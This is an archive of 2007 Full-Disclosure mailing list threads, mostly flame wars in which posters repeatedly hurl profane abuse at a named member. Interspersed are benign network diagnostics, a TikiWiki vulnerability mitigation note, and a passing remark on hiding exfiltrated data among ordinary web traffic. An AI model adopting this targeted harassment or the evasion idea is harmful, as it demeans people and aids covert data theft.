Hush 2.5 wpwEAQECAAYFAkcVAcQACgkQ+dWaEhErNvSa3gP5AXq4yJqozOQhpaJg/WtXwUcRrxz 6 ncYXpsrN5Lt2ZU3ehbwiTUZHuSq3JCo259u/9+KhL8fM5UBM1YScPnh6GA+dTEB4iGN b /aFymB4V26wUXV/NJLk/hcPEWKrxJ08dznUg4qJGYD2q/mT/Voff9OKbtVc8wIBwR+T f 9ddML2Q= =VF6Y -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVH/IACgkQ+dWaEhErNvTXXgP+MENm+a+vnXL34+nux03kMN4H6icV bZ+IyIvvkLzQ421OvNWMeLwGLcLKZqALtzkJVd4cUJCb152G7ANzkLF+xB2kX8BOpWN6 ItM6p7Gkq6zEawh7P+q+2MFom5RAYATQgC9Tjk0VqDWcC04CO5+qmdMpel/EdD5XXIyp 0Z28WGk= =kfq3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MailServer Notification]Content Filtering Notification
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 stop swearing in email please On Tue, 16 Oct 2007 16:18:11 -0400 [EMAIL PROTECTED] wrote: This email has violated the PROFANITY. and Quarantine entire message has been taken on 16/10/2007 22.17.33. Message details: Server:MAIL1RELAY Sender: [EMAIL PROTECTED]; Recipient:full- [EMAIL PROTECTED];[EMAIL PROTECTED]; Subject:Re: [Full-disclosure] password hash, funny myth in the industry! -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcVICcACgkQ+dWaEhErNvQ//AP+PnEr5cSv7XHBr5gw476OVeV4aoO9 TpPANAPgP6/6UMcZmLcwt7pQKhYXj/nJhJOr6YW/poh8+OsPmzo09vhDDAAnZ0/iWPl/ +e0GS4jMn8cdLL9QdtxUaK7K9tOn9yfiUpMgvzpToqv3hyjvjV4pnrLO04uXfxVil609 R0UwNAY= =QZ02 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I think you're just terribly unfunny. On Sun, 14 Oct 2007 23:20:56 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: On 10/14/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Explain your joke Mister Vranesevich. Nah, I give up. I was just trying to annoy you as much as you try and annoy everyone else, but you have 100 times my annoyance factor(which is pretty impressive), and its a hopeless battle. Congrats! You win the scorn of hundreds! -JP -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcTdH8ACgkQ+dWaEhErNvRkOgP+MHPPA+nypoSqFBS9/gGcVLj6zr2K HrtLM1pInUFfJBBQI8HrR4K+YqLMOgnZRGj745TNUyEsdc4om3V/JA76v4fccRFFxXSS +GO2CiL9eSjz5oJ+RLWNLQgXFg4rJMQ+qaR891QzKSCtkV1rUOTtw9oqi5mDJyn4XN48 8HnvRck= =uuXv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://gcc.gnu.org/ml/gcc-help/2006-05/msg00267.html On Sat, 13 Oct 2007 17:44:53 -0400 worried security [EMAIL PROTECTED] wrote: On 10/13/07, Dude VanWinkle [EMAIL PROTECTED] wrote: On 10/13/07, worried security [EMAIL PROTECTED] wrote: On 10/13/07, Richard Golodner [EMAIL PROTECTED] wrote: Why don't you keep this offline between you and full- disclosure? I know Valdis and he does not give a damn about any of this sophomoric stuff. When you post legitimate security information your credibility is increased as well as the amount of respect you receive amongst the security community. Take this as friendly advice and nothing more. You should not threaten to play games as you may not be aware of who is reading this stuff. I know NSA, Interpol and FBI personnel who read this but will never reveal themselves, but you expose yourself to possible investigation by making threats. And that is never a good idea. I dont think that The Douchebag can be charged with threatening himself... You do realize that some trolls register multiple accounts on the same mailing list so that they can have the benefit of annoying everyone else while only talking to themselves. This is done in order to make people like you think that there is a serious discussion going on. -JP[EMAIL PROTECTED] boyee' And you do realise you are nothing more than an alias as well? I have nothing to do with [EMAIL PROTECTED], gobbles or anyone else. I clearly sign my e-mails with n3td3v if changing e-mail address. So thanks for playing, I am a serious security person who is British, I have nothing to do with any other alias, unless signed with the n3td3v tag, Thanks for playing JP, and btw, what does JP stand for? -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcSK7kACgkQ+dWaEhErNvQtOwP/SAyiRMqc7DLshwBMw8nLlqgilCRl yJ1fIHfCFeO3Q5GqZ/ZX/wx37DvpjY40JTnNREJErWJVlUVoqYSTh44DwPIZ1f/THzDJ X2+S6zrn2G2SKfbstkpHvID+sz1Az7Qhb768xIrAK1OWCDJvBd6oQhB4xmcAzqdIxHUO 5IC7PkA= =5o9z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Explain your joke Mister Vranesevich. On Sun, 14 Oct 2007 20:31:16 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: On 10/14/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://gcc.gnu.org/ml/gcc-help/2006-05/msg00267.html Oh yeah? two can play that game: http://www.forbiddenweb.org/topic/10084/index.html -JP -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcS2CQACgkQ+dWaEhErNvQpvwP+P1RDr9QqRNFPSbxv/BHcLZlW9Ux1 1HPdWMZcsQoFfaFMCMj8l2b3GYjE6bcKc8jd9hxGc0OFfxpsTeVehlnCnhattgz8i1hQ 9/JP/nFpp1NIsLgGhCBwTlh0WTSCBYqvOau4dmLAGn80qwlzb8EThDP1KDY8UPvlTlfq 5ezUoIE= =YTfZ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear 3APAPA, In the English language, the words criticism and suggestion are not synonyms. If you could please kindly point out where Vladis makes a suggestion (anywhere, anytime), or says anything constructive (anywhere, anytime), or anything remotely clever (anywhere, anytime) I would greatly appreciate it. I am however impressed with your use of advanced computer hacking tools such as host, openssl, and tcpdump in the Linux computer hacking environment. I feel your pain on the icmp issue as well. Some people are just ratfuck bastards. Cheers! On Fri, 12 Oct 2007 22:12:08 -0400 Harry Hoffman [EMAIL PROTECTED] solutions.net wrote: what is wrong with his suggestion? If you look at the situation the following things happen: [EMAIL PROTECTED] ~]$ host www.cnn.com www.cnn.com has address 64.236.16.20 www.cnn.com has address 64.236.16.52 www.cnn.com has address 64.236.24.12 www.cnn.com has address 64.236.29.120 www.cnn.com has address 64.236.91.21 www.cnn.com has address 64.236.91.22 www.cnn.com has address 64.236.91.23 www.cnn.com has address 64.236.91.24 Host www.cnn.com not found: 3(NXDOMAIN) [EMAIL PROTECTED] ~]$ openssl s_client -connect www.cnn.com:443 [EMAIL PROTECTED] ~]# tcpdump -i wlan0 -ln tcp port 443 and net '64.236' tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on wlan0, link-type EN10MB (Ethernet), capture size 96 bytes 22:02:32.427607 IP 192.168.1.103.35113 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 mss 1460,sackOK,timestamp 102380687 0,nop,wscale 7 22:02:35.427467 IP 192.168.1.103.35113 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 mss 1460,sackOK,timestamp 102383687 0,nop,wscale 7 22:02:41.427496 IP 192.168.1.103.35113 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 mss 1460,sackOK,timestamp 102389687 0,nop,wscale 7 22:02:53.427470 IP 192.168.1.103.35113 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 mss 1460,sackOK,timestamp 102401687 0,nop,wscale 7 22:03:17.427469 IP 192.168.1.103.35113 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 mss 1460,sackOK,timestamp 102425687 0,nop,wscale 7 22:04:05.427466 IP 192.168.1.103.35113 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 mss 1460,sackOK,timestamp 102473687 0,nop,wscale 7 22:05:41.427556 IP 192.168.1.103.47627 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 mss 1460,sackOK,timestamp 102569687 0,nop,wscale 7 22:05:44.427467 IP 192.168.1.103.47627 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 mss 1460,sackOK,timestamp 102572687 0,nop,wscale 7 22:05:50.427472 IP 192.168.1.103.47627 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 mss 1460,sackOK,timestamp 102578687 0,nop,wscale 7 22:06:02.428441 IP 192.168.1.103.47627 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 mss 1460,sackOK,timestamp 102590687 0,nop,wscale 7 If there are a ton of addresses associated with the hostname record you'd be sitting there for a long time, no? It'd be nice if sites sent a unreachable message but some ppl still believe that blocking all ICMP is ok... go figure. Cheers, Harry [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 MAYBE YOU HAVE A SUGGESTION OR SOMETHING CONSTRUCTIVE TO SAY AFTER ALL THESE YEARS VLADIS OR MAYBE YOU SHOULD SHUT THE FUCK UP!!! YOU AREN'T SMARTER THAN WE THINK YOU ARE On Fri, 12 Oct 2007 21:55:37 -0400 [EMAIL PROTECTED] wrote: On Fri, 12 Oct 2007 15:06:14 PDT, Kristian Erik Hermansen said: I just wanted to clarify that I am looking for an extension that will rewrite all encountered HTTP references in Firefox to HTTPS. I would already have a firewall or some other layer7 filtering device blocking unencrypted traffic. The addon Better Gmail does something similar to this, with the force HTTPS option, but not exactly... What should this hypothetical extension do if it automagically redirect http: to https:, but the target server is something that is only listening on port 80 because it doesn't have https: enabled? https://www.cnn.com just sorta sits there for me. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcQJ40ACgkQ+dWaEhErNvQjfAQAhvRta2YldG0s+RPwOOYQJhmavq4 c uo/dTsCd3EQy6yQru6oGcmWR7CdCo8EvwoTpB0EwLgVW4z7/lujiayEMECV4zejTNzt w NSabygNoko5I8wh5trmqvoSb4RfPW79qEWLgTosECR1dsCu5FfXuKZhgQwbweWpi09g h zDPTvGg= =jxe7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcQ1S8ACgkQ+dWaEhErNvTKWQP9FkS3CGP5+EN4cTf8WUbmbJfbJ4cP ZfizqYMy71CpaBYa
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 No idea you got an idea big guy? No? Shut the fuck up. On Fri, 12 Oct 2007 22:45:12 -0400 [EMAIL PROTECTED] wrote: On Sat, 13 Oct 2007 02:15:39 -, [EMAIL PROTECTED] said: I don't know about a browser extension, but you might be able to install apache with mod_ssl, mod_proxy, and mod_rewrite locally then basically have it take care of everything. Same problem still - you proxy, you rewrite it to port 443 - and the destination doesn't *have* anything at port 443. What should your Apache do? -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcQ1WoACgkQ+dWaEhErNvRtLgP/SEeA7WlCAvTeb86o3odJ3ZLOaOjx 5rzpTkck+bePAaWjaNQ/r1f4iRrwYRZ7IvwZcgNUhasurDrZNtcxJCOoEws+/peVgB+N XLRvMFFN/eHOTptpTtRv6KUbzy2T5dStwIzlhJWULqcYxDrLaYz45sSAQcmWIFiH7drG cbff8mI= =lWu2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *wow* you win an *award* for most *stars* used in an *email* to demonstrate your *mental* *superiority* and the *dude* was not even talking about pentesting he was talking about *browsing teh interweb* at net cafes. *you* could have asked for *clarifications* on what he was trying to *accomplish* and instead you chose to *try* becoming a *trendsetter* by using lots of *** in your *email* and still managed to be *completely* offtopic *and* continue to be *useless*. *at least* *gobbles* wants in your pants. http://lists.grok.org.uk/pipermail/full-disclosure/2007- October/066616.html On Sat, 13 Oct 2007 11:14:26 -0400 [EMAIL PROTECTED] wrote: On Sat, 13 Oct 2007 10:25:46 EDT, [EMAIL PROTECTED] said: No idea you got an idea big guy? No, merely pointing out a under-specification of the problem. There's any number of ways that it *could* be set up - the question is what the *desired* behavior is. Blindly rewriting everything to https: is *doable*, but results in some ugly corner cases. Now, Kristian's *original* request was you don't want to leak unencrypted data. The reasonable response is - is it OK to leak unencrypted, *unimportant* data (such as hitting www.cnn.com to check the news while you take a short break)? In fact, a *clever* pen tester may in fact *want* to have at least *some* innocuous port 80 traffic, just so they don't stand out because they're *only* doing port 443 traffic (And the *really* sneaky pen tester will maintain a pseudo-random stream of hits to CNN and google and the like, and tunnel their *important* data out via SSL to some site with a pr0n-for-pay-ish name like www.llamas-r- hot.com, because you *expect* to see that sort of traffic distrbution... ;) So while do everything over SSL may sound like a good first cut (and in fact *is* a good start), the overall question is what data do you want to conceal, and from whom, exactly? On Fri, 12 Oct 2007 22:45:12 -0400 [EMAIL PROTECTED] wrote: Same problem still - you proxy, you rewrite it to port 443 - and the destination doesn't *have* anything at port 443. What should your Apache do? And anybody who has been doing security for more than a week or so *knows* that failure to deal with corner cases like but there's nothing *listening* on port 443 is a *major* source of bugs and places to find your 0- days. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcRCGEACgkQ+dWaEhErNvTnRwP/XmLeKQ5ZrkbI8ih1BUvYS67JOuf9 t7CugsT7xZA1VbIvhs5YKiGnzp7SS2upqE1IzuoAMeVk6ZpqghMvZDol5+SCANrMaJCW cI66ybV7j5TtUTc1ESb1Hn85cHS0/A5epZ9qi9TxExyFQtKKRgSOlRy5y7QIB9xTIhS7 BMlQD0A= =oOP6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *what* *has* *vladis* *ever* *done* *other* *than* *reply* *with* *smug* *offtopic* *responses* *proving* *his* *incompetence*? *i* *have* *reported* *your* *irc* *channel* *to* *cert* *and* *your* *email* *address* *to* *the *intelligence* *agencies* *gobbles*. *do* *you* *think* *they* *will* *knock* *or* *just* *kick* *in* *your* *door* *or* *just* *breach* *your* *tin* *foil* *hat* *and* *steal* *your* *brainwaves*?* **SHUT*THE*FUCK*UP*VLADIS** On Sat, 13 Oct 2007 11:01:08 -0400 worried security [EMAIL PROTECTED] wrote: will the user with the e-mail address [EMAIL PROTECTED] please shut the fuck up. valdis is a respected member of the security community, he is a senior member, so will you shut up? i consider him a friend, he has never attacked you, so why are you attacking him? if you want to attack someone, attack gadi evron or robert lemos or some other random who deserve to be attacked. thank you man, and i know you're an ok guy, but LEAVE VALDIS ALONE!!! and don't attack me or i'll attack you understand? http://n3td3v.googlepages.com -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcRCS8ACgkQ+dWaEhErNvTRggP+J8nKKi8jbdPNjKFFpPYBaKbc7v4Y fI3cEk4YpcoPLJAlBFz0VqoP10kgIfiOtn8ZeltyW8eqABOZpqJmzigUjZ8OOZ0RIGzq p6+OGGjYI8aD9iDFCaSzrQ6k3IzURM7uV+1lZ1n412bg/2b3tZ/SG9sOVDe01Xk+uER2 5kTiusE= =iUnm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *no* *you* On Sat, 13 Oct 2007 14:14:28 -0400 worried security [EMAIL PROTECTED] wrote: On 10/13/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *what* *has* *vladis* *ever* *done* *other* *than* *reply* *with* *smug* *offtopic* *responses* *proving* *his* *incompetence*? *i* *have* *reported* *your* *irc* *channel* *to* *cert* *and* *your* *email* *address* *to* *the *intelligence* *agencies* *gobbles*. *do* *you* *think* *they* *will* *knock* *or* *just* *kick* *in* *your* *door* *or* *just* *breach* *your* *tin* *foil* *hat* *and* *steal* *your* *brainwaves*?* **SHUT*THE*FUCK*UP*VLADIS** gobbles have nothing to do with n3td3v seems like your *intelligence* is wrong. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcRHbUACgkQ+dWaEhErNvQazAQAhQzVOK+mHM7KPY1CVcZg2Mh1qu/A muLcBLXlJqckfUjl4pRDBttVoU7AVHl7AETdpTSg9hlsI81JcF9RpxaVDMJbmVpL4P3Q JLjfW5xhoOVZvKnd3DdpgnOPHqeYZTnZ91QLXcnLlyiwbB+oSX2+HqOo639S2zkEEKnX aJLxHdw= =TSRq -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tikiwiki 1.9.8 exploit ITW
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SHUT UP VLADIS THE PIG On Fri, 12 Oct 2007 06:23:02 -0400 3APA3A [EMAIL PROTECTED] wrote: Dear Moritz Naumann, This vulnerability was found by ShAnKaR http://securityvulns.ru/Sdocument162.html and reported on Bugtraq yesterday (see Vulnerabilities digest message). TikiWiki developers were informed on October, 8. --Friday, October 12, 2007, 1:20:06 AM, you wrote to full- [EMAIL PROTECTED]: MN Disabling url_fopen() or denying access to tiki- graph_formula.php for MN unauthenticated users will prevent your site from being exploited. MN I've notified the developers. MN If, what it says on http://dev.tikiwiki.org/Security is up to date (i.e. MN unfixed security issues of high priority initially reported 9 months MN ago), then you really should not use this software. -- ~/ZARAZA http://securityvulns.com/ Человек это тайна... я занимаюсь этой тайной чтобы быть человеком. (Достоевский) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcPcdMACgkQ+dWaEhErNvSBmQP/YyKViYrNIFmSJMwLKogC7aey9IkI FWfpKxLHIncZ5RVkEsOZbdj6gRDua1+L05oSuCKzKxkz77BVjZG3gCmEO9n0na9Ac7GF 4suxGSRnkXjn5uIIHJS+o7E0PgyaT5Vpos/210JAY0AI0jn8o53F2l+0WFFPmMUv3UPS pMn8fYk= =RkFL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] REALLY GOOD ARTICLE FROM SECURITYFOCUS
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 THIS IS A REALLY GOOD ARTICLE FROM SECURITYFOCUS. http://www.securityfocus.com/columnists/454 Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcP0V8ACgkQ+dWaEhErNvTpdgP+Idne9OUHOegqhoxOd2gf+PKFxatW LXNXG0PH7pfOPEYM2j5Zx8Ced6gvR7A9JncAq83t9cOlcjHtT7ywW+5SIwbkL54azarR LlDy3+5ZQ0mAQ+ab0aWAIGjb6qqr4ljZGf9uqeObcuVWB3ZqaA74mTc4XDLNmytjf7wQ /eCqTWM= =JtJE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] extension for Firefox to force HTTPS always?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 MAYBE YOU HAVE A SUGGESTION OR SOMETHING CONSTRUCTIVE TO SAY AFTER ALL THESE YEARS VLADIS OR MAYBE YOU SHOULD SHUT THE FUCK UP!!! YOU AREN'T SMARTER THAN WE THINK YOU ARE On Fri, 12 Oct 2007 21:55:37 -0400 [EMAIL PROTECTED] wrote: On Fri, 12 Oct 2007 15:06:14 PDT, Kristian Erik Hermansen said: I just wanted to clarify that I am looking for an extension that will rewrite all encountered HTTP references in Firefox to HTTPS. I would already have a firewall or some other layer7 filtering device blocking unencrypted traffic. The addon Better Gmail does something similar to this, with the force HTTPS option, but not exactly... What should this hypothetical extension do if it automagically redirect http: to https:, but the target server is something that is only listening on port 80 because it doesn't have https: enabled? https://www.cnn.com just sorta sits there for me. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcQJ40ACgkQ+dWaEhErNvQjfAQAhvRta2YldG0s+RPwOOYQJhmavq4c uo/dTsCd3EQy6yQru6oGcmWR7CdCo8EvwoTpB0EwLgVW4z7/lujiayEMECV4zejTNztw NSabygNoko5I8wh5trmqvoSb4RfPW79qEWLgTosECR1dsCu5FfXuKZhgQwbweWpi09gh zDPTvGg= =jxe7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Email Disclaimers...Legally Liable if breached?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VLADIS YOU ARE NOT LAWYER! YOU DO NOT EVEN KNOW HOW TO USE COMPUTER! SHUT UP VLADIS! On Thu, 11 Oct 2007 13:56:36 -0400 [EMAIL PROTECTED] wrote: On Wed, 10 Oct 2007 22:44:08 PDT, Troy said: I'm surprised we don't see more disclaimers with a copyright statement in them. I would think that using copyright law as an argument against unauthorized distribution of an email would stand a better chance in court than a non-binding disclaimer at the bottom of the message. The problem is that it's *really* hard to write the disclaimer with a copyright attached to it. The tricky part is to figure out how to make it *legal* to cite the text in a reply - how would you phrase your copyright statement to allow what I'm doing in this message? Also, copyright doesn't cover *ideas* well - so if the leaked e- mail has info about (for instance) a planned hostile corporate takeover, the *information* has escaped, and copyright only prohibits *that expression* from being copied. If I rephrase and restate the info, there's no copyright issue with my then telling all and sundry about the corporation that's about to have a hostile takeover... -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcOjs0ACgkQ+dWaEhErNvTnyAP+LVuOuLLcwGgWAqUlRcTWNoHqqARv iCP7lKBIrdOIOjvxMU36VmONsPm5DWeUtWfVolnv9SNIvUcc00E7GCZr3HUVnnLIqAt6 qpEzW8PJFHh1985VDN41wbjzJgSmyATWM7LWLtY7xTmSlDJLWQAqXpCUDmsvM1C0nCEq Wd9HcVc= =QWSq -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SHUT UP VLADIS On Thu, 11 Oct 2007 14:54:52 -0400 [EMAIL PROTECTED] wrote: On Wed, 10 Oct 2007 14:05:28 EDT, [EMAIL PROTECTED] said: SHUT UP VLADIS IF ANYONE CARED THEY WOULD JUST FREQUENT YOUR BLOG GET OFF THIS LIST THIS IS FOR SERIOUS SECURITY MATTERS ONLY You seem a tad confused regarding the use of the reply button, since: On Wed, 10 Oct 2007 07:14:32 -0400 pdp (architect) [EMAIL PROTECTED] wrote: I wasn't the one who you were replying to. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcOjuwACgkQ+dWaEhErNvSH/wP+OIDM7dHQMS0CGkCyKxqS7UTURari AvDPndt/tmbynO737col1TBfSbzLognqDpveQbpo0OfyHHldZagO2ulokvWURRxDQzxa rFYiV4SVSZYR69v5rwOy8tEPkb/tApXT172BmH2qqMUmPgnlF+V9EmzOOfumePnvrqZX 5QvPaws= =NO9u -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] If internet goes down out of hours, we're screwed
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SHUT UP VLADIS On Tue, 09 Oct 2007 23:08:16 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: On 10/9/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 You also missed an apostrophe in this post. On Tue, 09 Oct 2007 22:06:47 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: to worried security [EMAIL PROTECTED] Man, netdev, you are really outing the fact that you use several accounts to reply to yourself. Are you slippin'? --note the apostrophe -JP -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcMtl0ACgkQ+dWaEhErNvTP+QP9GyWy9rPyzxRM7I0h1CXP0SWgH8FW RjcdoPfJGf/Ob72Iebvl7IKwqT27icP9E1VcPWkFyyEPdm9+UzIkHsjDj7gTbuyqb3E/ fEHOMaI5pwqsp6yBWRwFn0kpWq9tEP2ASa9sNCw+6P/U87nxPur8nLaEgLFbUAeZ epj806g= =+6eB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 YES On Tue, 09 Oct 2007 23:10:07 -0400 Dude VanWinkle [EMAIL PROTECTED] wrote: On 10/9/07, [EMAIL PROTECTED] full- [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE-ww.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 So iz yer new [EMAIL PROTECTED] handl3 UTF8 or Hush 2.5? -JPthe easily confused -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkcMtnEACgkQ+dWaEhErNvR0gAP7BSogdQYkq+H28a5C7h81GEBGjHgm DKizFsqOxdrKbORuAi4dvpDrmw/3r+iLZBoWHNn86BbdDCbfyaZjOxI06V+h5vuNzdVI rgOwzOj58hY0PDsg8RzQMIXE4Bfj8QgqitjQVq0gCh3+sPKJNp2ULmJ12KqAET1COdos zEicxSk= =QeXe -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day: Hacking secured CITRIX from outside
